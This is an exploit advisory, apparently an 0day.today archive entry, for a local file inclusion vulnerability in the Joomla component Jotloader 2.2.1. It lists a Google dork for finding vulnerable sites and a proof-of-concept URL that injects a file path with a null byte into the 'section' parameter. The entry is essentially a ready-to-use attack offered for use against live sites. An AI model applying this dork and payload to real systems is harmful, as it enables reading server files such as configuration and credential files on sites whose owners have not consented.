id: 15218
date: 12/21/2010
title: Joomla Component Jotloader 2.2.1 (com_jotloader) LFI Vulnerability
author: v3n0m
cves: 

Author      : v3n0m (v3n0m666[at]live[dot]com)
Site        : http://yogyacarderlink.web.id/
Date        : December, 20-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
 
Application : JotLoader
License     : GPLv2
Version     : 2.2.1 Other versions may also be affected
Vendor      : http://www.kanich.net/radio/site/jotloader
Google Dorks    : inurl:com_jotloader
 
Exploit & p0c
_____________
 
**[LFI]
http://127.0.0.1/[path]/index.php?option=com_jotloader&section=[LFI]%00



#  0day.today [2023-03-23]  #